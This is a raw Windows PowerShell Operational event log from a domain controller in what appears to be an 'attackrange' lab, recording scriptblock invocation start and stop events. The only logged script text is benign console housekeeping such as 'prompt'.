TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476842
Keywords=None
Message=Started invocation of ScriptBlock ID: 54237f90-06a6-4451-ba91-3774e29acc6f
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476841
Keywords=None
Message=Started invocation of ScriptBlock ID: cba7ae51-8562-441c-bcdb-dca872c51cc0
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476840
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: cba7ae51-8562-441c-bcdb-dca872c51cc0
Path:
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476839
Keywords=None
Message=Started invocation of ScriptBlock ID: b8059e10-bd2e-4cea-8637-dced20a64566
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476838
Keywords=None
Message=Completed invocation of ScriptBlock ID: 10944b0b-c4b4-4f01-97e6-47236e6dd5f5
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476837
Keywords=None
Message=Started invocation of ScriptBlock ID: 10944b0b-c4b4-4f01-97e6-47236e6dd5f5
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476869
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476868
Keywords=None
Message=Completed invocation of ScriptBlock ID: 91991f34-fd1a-499a-8924-adc443810c90
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476867
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476866
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476865
Keywords=None
Message=Started invocation of ScriptBlock ID: 91991f34-fd1a-499a-8924-adc443810c90
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476864
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 91991f34-fd1a-499a-8924-adc443810c90
Path:
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476863
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476862
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476861
Keywords=None
Message=Completed invocation of ScriptBlock ID: 51690bde-47a7-4a7f-87f1-05acb76b284c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476860
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:03:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476859
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476883
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476882
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6684bd1c-04e3-48b3-b530-ecb882de8d4f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476881
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476880
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476879
Keywords=None
Message=Started invocation of ScriptBlock ID: 6684bd1c-04e3-48b3-b530-ecb882de8d4f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476878
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 6684bd1c-04e3-48b3-b530-ecb882de8d4f
Path:
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476877
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476876
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476875
Keywords=None
Message=Completed invocation of ScriptBlock ID: c0ca0ac2-c748-4603-b111-ca66998a03d6
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476874
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476873
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476872
Keywords=None
Message=Started invocation of ScriptBlock ID: c0ca0ac2-c748-4603-b111-ca66998a03d6
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476871
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: c0ca0ac2-c748-4603-b111-ca66998a03d6
Path:
06/15/2021 05:04:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476870
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477263
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477262
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4b4b064f-8574-4edb-a956-f553aac1f7a4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477261
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477260
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477259
Keywords=None
Message=Started invocation of ScriptBlock ID: 4b4b064f-8574-4edb-a956-f553aac1f7a4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477258
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 4b4b064f-8574-4edb-a956-f553aac1f7a4
Path:
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477257
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477256
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477255
Keywords=None
Message=Completed invocation of ScriptBlock ID: e4e4e254-fb69-40ee-b4cf-c0286ae8b839
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477254
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477253
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477252
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477251
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477250
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477249
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477248
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477247
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477246
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477245
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477244
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477243
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477242
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477241
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477240
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477239
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
